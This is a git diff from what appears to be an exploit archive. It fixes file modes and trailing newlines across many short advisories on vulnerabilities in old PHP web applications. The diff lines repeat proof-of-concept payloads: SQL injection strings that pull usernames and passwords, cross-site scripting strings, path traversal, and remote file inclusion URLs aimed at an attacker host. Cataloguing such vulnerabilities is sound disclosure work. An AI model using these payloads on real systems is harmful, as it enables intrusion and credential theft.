an SQL injection vulnerability. This issue is d Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/files.php?cat='&sort \ No newline at end of file +http://www.example.com/files.php?cat='&sort \ No newline at end of file diff --git a/platforms/php/webapps/26545.txt b/platforms/php/webapps/26545.txt old mode 100755 new mode 100644 index 07829e2a0..4a456a026 --- a/platforms/php/webapps/26545.txt +++ b/platforms/php/webapps/26545.txt @@ -5,4 +5,4 @@ Nuke ET is prone to an SQL injection vulnerability. This issue is due to a failu Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. Insert the following into the 'query' field of http://www.example.com/modules.php?name=Search: -s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/* \ No newline at end of file +s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/* \ No newline at end of file diff --git a/platforms/php/webapps/26546.txt b/platforms/php/webapps/26546.txt old mode 100755 new mode 100644 index 787054219..a8f86fff4 --- a/platforms/php/webapps/26546.txt +++ b/platforms/php/webapps/26546.txt @@ -4,4 +4,4 @@ PHP-Post is prone to multiple cross-site scripting vulnerabilities because the a An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. The attacker may also be able to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/phpp/profile.php?user='%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E \ No newline at end of file +http://www.example.com/phpp/profile.php?user='%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E \ No newline at end of file diff --git a/platforms/php/webapps/26547.txt b/platforms/php/webapps/26547.txt old mode 100755 new mode 100644 index 76184052e..356ef5d04 --- a/platforms/php/webapps/26547.txt +++ b/platforms/php/webapps/26547.txt @@ -4,4 +4,4 @@ PHP-Post is prone to multiple cross-site scripting vulnerabilities because the a An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. The attacker may also be able to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/phpp/mail.php?user='%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E \ No newline at end of file +http://www.example.com/phpp/mail.php?user='%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E \ No newline at end of file diff --git a/platforms/php/webapps/26549.txt b/platforms/php/webapps/26549.txt old mode 100755 new mode 100644 index b3298fa24..617593f08 --- a/platforms/php/webapps/26549.txt +++ b/platforms/php/webapps/26549.txt @@ -7,4 +7,4 @@ An attacker can exploit this issue to retrieve arbitrary remote PHP code on an a Torrential Version 1.2 is vulnerable; other versions may also be vulnerable. http://www.example.com/torrential/dox/getdox.php/../forums.php -http://www.example.com/torrential/dox/getdox.php/../../index.html \ No newline at end of file +http://www.example.com/torrential/dox/getdox.php/../../index.html \ No newline at end of file diff --git a/platforms/php/webapps/2655.php b/platforms/php/webapps/2655.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26553.txt b/platforms/php/webapps/26553.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26559.txt b/platforms/php/webapps/26559.txt old mode 100755 new mode 100644 index b1a852b89..ffbbad59e --- a/platforms/php/webapps/26559.txt +++ b/platforms/php/webapps/26559.txt @@ -4,4 +4,4 @@ Virtual Hosting Control System is prone to cross-site scripting attacks. The vulnerability arises when error messages are rendered and could let an attacker inject hostile HTML and script code into the browser session of another user in the context of the site hosting the application. This could allow for theft of cookie-based authentication credentials or other attacks. -http://www.example.com/dev/inputvalidation%3Cscript%3Ealert(window.location.hash)%3B%3C/script%3E#XSS \ No newline at end of file +http://www.example.com/dev/inputvalidation%3Cscript%3Ealert(window.location.hash)%3B%3C/script%3E#XSS \ No newline at end of file diff --git a/platforms/php/webapps/2656.txt b/platforms/php/webapps/2656.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26560.txt b/platforms/php/webapps/26560.txt old mode 100755 new mode 100644 index f309865ad..5096716cc --- a/platforms/php/webapps/26560.txt +++ b/platforms/php/webapps/26560.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to have arbitrary script code execute in the PmWiki 2.0 up to and including 2.0.12 are vulnerable; other versions may also be affected. -http://www.example.com/Site/Search?action=search&q=TRY%20ANOTHER%20SEARCH%20NOW!%20YES,%20YOU!'%20onMouseOver='alert(document.title);'%20 \ No newline at end of file +http://www.example.com/Site/Search?action=search&q=TRY%20ANOTHER%20SEARCH%20NOW!%20YES,%20YOU!'%20onMouseOver='alert(document.title);'%20 \ No newline at end of file diff --git a/platforms/php/webapps/26561.txt b/platforms/php/webapps/26561.txt old mode 100755 new mode 100644 index ea0a70715..a897228e0 --- a/platforms/php/webapps/26561.txt +++ b/platforms/php/webapps/26561.txt @@ -4,4 +4,4 @@ source: http://www.securityfocus.com/bid/15544/info Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/process.php?pname=ShowAlbumDetailsProcess-Start&CategoryID=CategoryID&AlbumID=[sql] \ No newline at end of file +http://www.example.com/process.php?pname=ShowAlbumDetailsProcess-Start&CategoryID=CategoryID&AlbumID=[sql] \ No newline at end of file diff --git a/platforms/php/webapps/26562.txt b/platforms/php/webapps/26562.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26563.txt b/platforms/php/webapps/26563.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26564.txt b/platforms/php/webapps/26564.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26565.txt b/platforms/php/webapps/26565.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26566.txt b/platforms/php/webapps/26566.txt old mode 100755 new mode 100644 index 064fcca99..f1a48ffa5 --- a/platforms/php/webapps/26566.txt +++ b/platforms/php/webapps/26566.txt @@ -8,4 +8,4 @@ Successful exploitation of the SQL injection issue could result in a compromise The cross-site scripting issue may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/tunez/search.php?action=doSearch&searchFor=[code]&search_type=all \ No newline at end of file +http://www.example.com/tunez/search.php?action=doSearch&searchFor=[code]&search_type=all \ No newline at end of file diff --git a/platforms/php/webapps/26567.txt b/platforms/php/webapps/26567.txt old mode 100755 new mode 100644 index d124b1233..0047f4251 --- a/platforms/php/webapps/26567.txt +++ b/platforms/php/webapps/26567.txt @@ -4,4 +4,4 @@ WSN Forum is prone to an SQL injection vulnerability. This issue is due to a fai Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/memberlist.php?action=profile&id=1[SQL] \ No newline at end of file +http://www.example.com/memberlist.php?action=profile&id=1[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26568.txt b/platforms/php/webapps/26568.txt old mode 100755 new mode 100644 index 68dff8fe7..fa1df6490 --- a/platforms/php/webapps/26568.txt +++ b/platforms/php/webapps/26568.txt @@ -7,4 +7,4 @@ Successful exploitation could result in a compromise of the application, disclos This issue affects OmnistarLive version 5.2; earlier versions may also be vulnerable. http://www.example.com/kb.php?id=10006&category_id=[SQL] -http://www.example.com/kb.php?id=[SQL] \ No newline at end of file +http://www.example.com/kb.php?id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26569.txt b/platforms/php/webapps/26569.txt old mode 100755 new mode 100644 index 33dca4f63..4b2f2a055 --- a/platforms/php/webapps/26569.txt +++ b/platforms/php/webapps/26569.txt @@ -4,4 +4,4 @@ PHP Labs Survey Wizard is prone to an SQL injection vulnerability. This issue is Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/survey.php?sid=[SQL] \ No newline at end of file +http://www.example.com/survey.php?sid=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26570.txt b/platforms/php/webapps/26570.txt old mode 100755 new mode 100644 index 124e424b2..45fe1852f --- a/platforms/php/webapps/26570.txt +++ b/platforms/php/webapps/26570.txt @@ -4,4 +4,4 @@ CommodityRentals is prone to an SQL injection vulnerability. Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/DVD/moviedetails.php?usersession=&user_id=[sql]&movie_id=312 \ No newline at end of file +http://www.example.com/DVD/moviedetails.php?usersession=&user_id=[sql]&movie_id=312 \ No newline at end of file diff --git a/platforms/php/webapps/26571.txt b/platforms/php/webapps/26571.txt old mode 100755 new mode 100644 index e4b34290d..15b23ad37 --- a/platforms/php/webapps/26571.txt +++ b/platforms/php/webapps/26571.txt @@ -8,4 +8,4 @@ Ezyhelpdesk version 1.0 and earlier are affected. http://www.example.com/?edit=spec_view&edit_id=[SQL] http://www.example.com/?mid=41&m2id=42&page=1&faq_id=[SQL] -http://www.example.com/?mid=41&m2id=42&page=1&c_id=[SQL] \ No newline at end of file +http://www.example.com/?mid=41&m2id=42&page=1&c_id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26572.txt b/platforms/php/webapps/26572.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26573.txt b/platforms/php/webapps/26573.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26574.txt b/platforms/php/webapps/26574.txt old mode 100755 new mode 100644 index ca0a61763..4f8a6a52d --- a/platforms/php/webapps/26574.txt +++ b/platforms/php/webapps/26574.txt @@ -5,4 +5,4 @@ blogBuddies is prone to multiple cross-site scripting vulnerabilities. These iss An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. http://www.example.com/computechnix/blogbuddies/magpierss-0.71/scripts/ -magpie_slashbox.php?rss_url="><script>alert("...");</script> \ No newline at end of file +magpie_slashbox.php?rss_url="><script>alert("...");</script> \ No newline at end of file diff --git a/platforms/php/webapps/26576.txt b/platforms/php/webapps/26576.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2658.php b/platforms/php/webapps/2658.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26580.txt b/platforms/php/webapps/26580.txt old mode 100755 new mode 100644 index cbfb99561..12c7ac847 --- a/platforms/php/webapps/26580.txt +++ b/platforms/php/webapps/26580.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Version 1.1 and earlier are affected; other versions may also be affected. -http://www.example.com/search_result.php?cid=[sql] \ No newline at end of file +http://www.example.com/search_result.php?cid=[sql] \ No newline at end of file diff --git a/platforms/php/webapps/26581.txt b/platforms/php/webapps/26581.txt old mode 100755 new mode 100644 index 26509ef9b..15cba456b --- a/platforms/php/webapps/26581.txt +++ b/platforms/php/webapps/26581.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Version 1.1 and earlier are affected; other versions may also be affected. -http://www.example.com/review.php?sbres_id=[sql] \ No newline at end of file +http://www.example.com/review.php?sbres_id=[sql] \ No newline at end of file diff --git a/platforms/php/webapps/26582.txt b/platforms/php/webapps/26582.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26583.txt b/platforms/php/webapps/26583.txt old mode 100755 new mode 100644 index deb6f9b55..89f47e7ad --- a/platforms/php/webapps/26583.txt +++ b/platforms/php/webapps/26583.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Version 1.1 and earlier are affected; other versions may also be affected. -http://www.example.com/email.php?&h_id=[sql] \ No newline at end of file +http://www.example.com/email.php?&h_id=[sql] \ No newline at end of file diff --git a/platforms/php/webapps/26584.txt b/platforms/php/webapps/26584.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26585.txt b/platforms/php/webapps/26585.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26586.txt b/platforms/php/webapps/26586.txt old mode 100755 new mode 100644 index 678834581..70fe6c536 --- a/platforms/php/webapps/26586.txt +++ b/platforms/php/webapps/26586.txt @@ -10,4 +10,4 @@ Some of these issues may be related to those discussed in BID 11740 (SugarCRM Mu An independent study by Daniel Fabian of SEC-CONSULT has confirmed the existence of several of these issues. Please see the referenced advisory for more information. -http://www.example.com/?ticket_title=&contact_name=&priority=&status=&action=index&query=true&module=HelpDesk&order_by=&sorder=ASC&viewname=0&button=Search&category=&date_crit=is&date=%27+UNION+SELECT+56%2CCONCAT%28user_name%2C+%22%3A%22%2C+user_password%29%2C+%22Open%22%2C%22Normal%22%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1+from+users+where+users.user_name+LIKE+%27 \ No newline at end of file +http://www.example.com/?ticket_title=&contact_name=&priority=&status=&action=index&query=true&module=HelpDesk&order_by=&sorder=ASC&viewname=0&button=Search&category=&date_crit=is&date=%27+UNION+SELECT+56%2CCONCAT%28user_name%2C+%22%3A%22%2C+user_password%29%2C+%22Open%22%2C%22Normal%22%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1+from+users+where+users.user_name+LIKE+%27 \ No newline at end of file diff --git a/platforms/php/webapps/26587.txt b/platforms/php/webapps/26587.txt old mode 100755 new mode 100644 index 6af7c03e8..bebaa6752 --- a/platforms/php/webapps/26587.txt +++ b/platforms/php/webapps/26587.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Version 3.1 and earlier are affected; other versions may also be vulnerable. -http://www.example.com/index.php?pageaction=results&campaign_id=[SQL] \ No newline at end of file +http://www.example.com/index.php?pageaction=results&campaign_id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26588.txt b/platforms/php/webapps/26588.txt old mode 100755 new mode 100644 index 31aa3116b..c2e9f2bb8 --- a/platforms/php/webapps/26588.txt +++ b/platforms/php/webapps/26588.txt @@ -4,4 +4,4 @@ Orca Forum is prone to an SQL injection vulnerability. This issue is due to a fa Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/forum.php?msg=[SQL] \ No newline at end of file +http://www.example.com/forum.php?msg=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26589.txt b/platforms/php/webapps/26589.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2659.php b/platforms/php/webapps/2659.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26590.txt b/platforms/php/webapps/26590.txt old mode 100755 new mode 100644 index ab00d3f94..f5c9547bd --- a/platforms/php/webapps/26590.txt +++ b/platforms/php/webapps/26590.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos OvBB 0.08a and prior versions are reportedly affected. -http://www.example.com/forums/profile.php?userid=[SQL] \ No newline at end of file +http://www.example.com/forums/profile.php?userid=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26591.txt b/platforms/php/webapps/26591.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26592.txt b/platforms/php/webapps/26592.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26593.txt b/platforms/php/webapps/26593.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26594.txt b/platforms/php/webapps/26594.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26595.txt b/platforms/php/webapps/26595.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26596.txt b/platforms/php/webapps/26596.txt old mode 100755 new mode 100644 index 84ac01446..4c03a25e4 --- a/platforms/php/webapps/26596.txt +++ b/platforms/php/webapps/26596.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Version 1.4.92 is reported to be affected; earlier versions may also be vulnerable. -http://www.example.com/?_page=product_cat:t_Paged%20Listing&id=1[SQL] \ No newline at end of file +http://www.example.com/?_page=product_cat:t_Paged%20Listing&id=1[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26597.txt b/platforms/php/webapps/26597.txt old mode 100755 new mode 100644 index 6da2b4148..988881033 --- a/platforms/php/webapps/26597.txt +++ b/platforms/php/webapps/26597.txt @@ -12,4 +12,4 @@ Input to the "URL" field: '';!--"<script>alert(String.fromCharCode(88,83,83)); </script> Input to the email field: -dude@what.com'';!--"<mycode> \ No newline at end of file +dude@what.com'';!--"<mycode> \ No newline at end of file diff --git a/platforms/php/webapps/26598.txt b/platforms/php/webapps/26598.txt old mode 100755 new mode 100644 index abb69bdcf..19fdfb068 --- a/platforms/php/webapps/26598.txt +++ b/platforms/php/webapps/26598.txt @@ -4,4 +4,4 @@ Athena PHP Website Administration is prone to a remote file include vulnerabilit An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. -http://www.example.com/path_to_athena/athena.php?athena_dir=http://[attacker_url] \ No newline at end of file +http://www.example.com/path_to_athena/athena.php?athena_dir=http://[attacker_url] \ No newline at end of file diff --git a/platforms/php/webapps/26599.txt b/platforms/php/webapps/26599.txt old mode 100755 new mode 100644 index cc748286a..9c40c10a6 --- a/platforms/php/webapps/26599.txt +++ b/platforms/php/webapps/26599.txt @@ -4,4 +4,4 @@ phpGreetz is prone to a remote file include vulnerability. This issue is due to An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. -http://www.example.com/path_to_phpgreetz/content.php?content=http://[attacker_url] \ No newline at end of file +http://www.example.com/path_to_phpgreetz/content.php?content=http://[attacker_url] \ No newline at end of file diff --git a/platforms/php/webapps/2660.php b/platforms/php/webapps/2660.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26600.txt b/platforms/php/webapps/26600.txt old mode 100755 new mode 100644 index 3eb58d055..b0da9c811 --- a/platforms/php/webapps/26600.txt +++ b/platforms/php/webapps/26600.txt @@ -4,4 +4,4 @@ Q-News is prone to a remote file include vulnerability. This issue is due to a f An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. -http://www.example.com/path_to_qnews/q-news.php?id=http://[attacker_url] \ No newline at end of file +http://www.example.com/path_to_qnews/q-news.php?id=http://[attacker_url] \ No newline at end of file diff --git a/platforms/php/webapps/26602.txt b/platforms/php/webapps/26602.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26603.txt b/platforms/php/webapps/26603.txt old mode 100755 new mode 100644 index fb810d463..bc2739d86 --- a/platforms/php/webapps/26603.txt +++ b/platforms/php/webapps/26603.txt @@ -4,4 +4,4 @@ Enterprise Connector is prone to SQL injection vulnerabilities. These issues are Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -/messages.php?action=delete&messageid=[SQL] \ No newline at end of file +/messages.php?action=delete&messageid=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26604.txt b/platforms/php/webapps/26604.txt old mode 100755 new mode 100644 index 9ec1d9191..1bd645e10 --- a/platforms/php/webapps/26604.txt +++ b/platforms/php/webapps/26604.txt @@ -4,4 +4,4 @@ Zainu is prone to SQL injection vulnerabilities. These issues are due to a failu Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -/index.php?in=song&term=[SQL]&action=search&start=[SQL] \ No newline at end of file +/index.php?in=song&term=[SQL]&action=search&start=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26605.txt b/platforms/php/webapps/26605.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26606.txt b/platforms/php/webapps/26606.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26607.txt b/platforms/php/webapps/26607.txt old mode 100755 new mode 100644 index 78581687c..31bd27acc --- a/platforms/php/webapps/26607.txt +++ b/platforms/php/webapps/26607.txt @@ -8,4 +8,4 @@ Successful exploitation could result in a compromise of the application, disclos /modules.php?name=topMusic&op=song&idartist=1&idalbum=1&idsong=[SQL] -/modules.php?name=topMusic&op=song&idartist=1&idalbum=[SQL] \ No newline at end of file +/modules.php?name=topMusic&op=song&idartist=1&idalbum=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26608.txt b/platforms/php/webapps/26608.txt old mode 100755 new mode 100644 index 2491f78ce..d2f54edb3 --- a/platforms/php/webapps/26608.txt +++ b/platforms/php/webapps/26608.txt @@ -8,4 +8,4 @@ PHPWordPress versions up to and including 3.0 are reported to be vulnerable; oth http://www.example.com/index.php?poll=[SQL] http://www.example.com/index.php?category=[SQL] -http://www.example.com/?archive&ctg=[SQL] \ No newline at end of file +http://www.example.com/?archive&ctg=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26609.txt b/platforms/php/webapps/26609.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26610.txt b/platforms/php/webapps/26610.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26611.txt b/platforms/php/webapps/26611.txt old mode 100755 new mode 100644 index 3e97aaefa..be45eff10 --- a/platforms/php/webapps/26611.txt +++ b/platforms/php/webapps/26611.txt @@ -4,4 +4,4 @@ Bedeng PSP is prone to SQL injection vulnerabilities. These issues are due to a Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -/index.php?cwhere=a.nsub=[SQL] \ No newline at end of file +/index.php?cwhere=a.nsub=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26612.txt b/platforms/php/webapps/26612.txt old mode 100755 new mode 100644 index c561734ab..415a2436f --- a/platforms/php/webapps/26612.txt +++ b/platforms/php/webapps/26612.txt @@ -7,4 +7,4 @@ Successful exploitation could result in a compromise of the application, disclos /index.html?m=comments&id=[SQL] /index.html?m=show&id=1[SQL] /index.html?m=search&opt=search_proceed&keywords -=175&nnet_uid=1&nnet_catid=[SQL] \ No newline at end of file +=175&nnet_uid=1&nnet_catid=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26613.txt b/platforms/php/webapps/26613.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26614.txt b/platforms/php/webapps/26614.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26615.txt b/platforms/php/webapps/26615.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26616.txt b/platforms/php/webapps/26616.txt old mode 100755 new mode 100644 index e769ff78c..a32a98f23 --- a/platforms/php/webapps/26616.txt +++ b/platforms/php/webapps/26616.txt @@ -4,4 +4,4 @@ Softbiz Resource Repository Script is prone to SQL injection vulnerabilities. Th Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -/report_link.php?sbres_id=1[SQL] \ No newline at end of file +/report_link.php?sbres_id=1[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26617.txt b/platforms/php/webapps/26617.txt old mode 100755 new mode 100644 index b27f66207..b976f0ec6 --- a/platforms/php/webapps/26617.txt +++ b/platforms/php/webapps/26617.txt @@ -4,4 +4,4 @@ BerliOS SourceWell is prone to an SQL injection vulnerability. This issue is due Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -/index.php?start=2005-11-28&days=1&cnt=[SQL] \ No newline at end of file +/index.php?start=2005-11-28&days=1&cnt=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26618.txt b/platforms/php/webapps/26618.txt old mode 100755 new mode 100644 index 902acf0d4..817d2a9a4 --- a/platforms/php/webapps/26618.txt +++ b/platforms/php/webapps/26618.txt @@ -4,4 +4,4 @@ AllWeb Search is prone to an SQL injection vulnerability. This issue is due to a Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -/index.php?search=[SQL]&type=web \ No newline at end of file +/index.php?search=[SQL]&type=web \ No newline at end of file diff --git a/platforms/php/webapps/26619.txt b/platforms/php/webapps/26619.txt old mode 100755 new mode 100644 index ce0267309..2daff8a12 --- a/platforms/php/webapps/26619.txt +++ b/platforms/php/webapps/26619.txt @@ -13,4 +13,4 @@ Successful exploitation could result in a compromise of the application, disclos /index.php?req=view&act=status&id=1&stat=[SQL] /index.php?req=view&act=status&id=[SQL] /index.php?req=delsite&id=[SQL] -/index.php?req=search&source=[SQL] \ No newline at end of file +/index.php?req=search&source=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26623.txt b/platforms/php/webapps/26623.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26624.txt b/platforms/php/webapps/26624.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26625.txt b/platforms/php/webapps/26625.txt old mode 100755 new mode 100644 index 4f5c561d6..03c0497fb --- a/platforms/php/webapps/26625.txt +++ b/platforms/php/webapps/26625.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos /edmobbs9r.php?messageID=1&table=[SQL] -/edmobbs9r.php?messageID=1[SQL] \ No newline at end of file +/edmobbs9r.php?messageID=1[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26626.txt b/platforms/php/webapps/26626.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26627.txt b/platforms/php/webapps/26627.txt old mode 100755 new mode 100644 index aecf23eef..0864f4e69 --- a/platforms/php/webapps/26627.txt +++ b/platforms/php/webapps/26627.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos /topic.php?CAT_ID=1&FORUM_ID=1&TOPIC_ID=[SQL] /topic.php?CAT_ID=1&FORUM_ID=[SQL] -/topic.php?CAT_ID=[SQL] \ No newline at end of file +/topic.php?CAT_ID=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26628.txt b/platforms/php/webapps/26628.txt old mode 100755 new mode 100644 index ab8d4c845..01c6cfa62 --- a/platforms/php/webapps/26628.txt +++ b/platforms/php/webapps/26628.txt @@ -4,4 +4,4 @@ ShockBoard is prone to an SQL injection vulnerability. This issue is due to a fa Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -/topic.php?offset=[SQL] \ No newline at end of file +/topic.php?offset=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26629.txt b/platforms/php/webapps/26629.txt old mode 100755 new mode 100644 index 1382eb68e..be154d297 --- a/platforms/php/webapps/26629.txt +++ b/platforms/php/webapps/26629.txt @@ -4,4 +4,4 @@ Netzbrett is prone to an SQL injection vulnerability. This issue is due to a fai Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -/index.php?p_lng=en&p_days=15&p_cmd=entry&p_entry=1[SQL] \ No newline at end of file +/index.php?p_lng=en&p_days=15&p_cmd=entry&p_entry=1[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/2663.txt b/platforms/php/webapps/2663.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26630.txt b/platforms/php/webapps/26630.txt old mode 100755 new mode 100644 index ccceb8370..d808f886a --- a/platforms/php/webapps/26630.txt +++ b/platforms/php/webapps/26630.txt @@ -5,4 +5,4 @@ ADC2000 NG Pro is prone to SQL injection vulnerabilities. These issues are due t Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. /adcbrowres.php?lang=english&cat=[SQL] -/adcbrowres.php?lang=[SQL] \ No newline at end of file +/adcbrowres.php?lang=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26631.txt b/platforms/php/webapps/26631.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26632.txt b/platforms/php/webapps/26632.txt old mode 100755 new mode 100644 index c901bb2e3..f53162647 --- a/platforms/php/webapps/26632.txt +++ b/platforms/php/webapps/26632.txt @@ -4,4 +4,4 @@ Simple Document Management System (SDMS) is prone to SQL injection vulnerabiliti Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -/messages.php?forum=1&action=view&mid=[SQL] \ No newline at end of file +/messages.php?forum=1&action=view&mid=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26633.txt b/platforms/php/webapps/26633.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26634.txt b/platforms/php/webapps/26634.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26635.txt b/platforms/php/webapps/26635.txt old mode 100755 new mode 100644 index e045358e2..45a1ebbf9 --- a/platforms/php/webapps/26635.txt +++ b/platforms/php/webapps/26635.txt @@ -38,4 +38,4 @@ domain=<script>alert(1)</script>&site= curl http://www.example.com/fws/pixel.php?site= &jsres=&jscolor=&jsref=http://www.example.com/search? q=ppoopp<script language=?javascript?-src= -"http://www.example.com/fws/inject.js?></script>&hl=it" \ No newline at end of file +"http://www.example.com/fws/inject.js?></script>&hl=it" \ No newline at end of file diff --git a/platforms/php/webapps/26636.txt b/platforms/php/webapps/26636.txt old mode 100755 new mode 100644 index a60e4516b..5622468e0 --- a/platforms/php/webapps/26636.txt +++ b/platforms/php/webapps/26636.txt @@ -12,4 +12,4 @@ curl -A Opera http://www.example.com/stat/pixel.php -e ?<a href=http://www.example.com>go-google</a>? curl -A Opera http://www.example.com/stat/pixel.php -e -?<script>alert(123123);</script>? \ No newline at end of file +?<script>alert(123123);</script>? \ No newline at end of file diff --git a/platforms/php/webapps/26637.txt b/platforms/php/webapps/26637.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26638.txt b/platforms/php/webapps/26638.txt old mode 100755 new mode 100644 index 6271fc0be..55228dc31 --- a/platforms/php/webapps/26638.txt +++ b/platforms/php/webapps/26638.txt @@ -8,4 +8,4 @@ Helpdesk Issue Manager 0.9 and prior versions are reportedly affected. 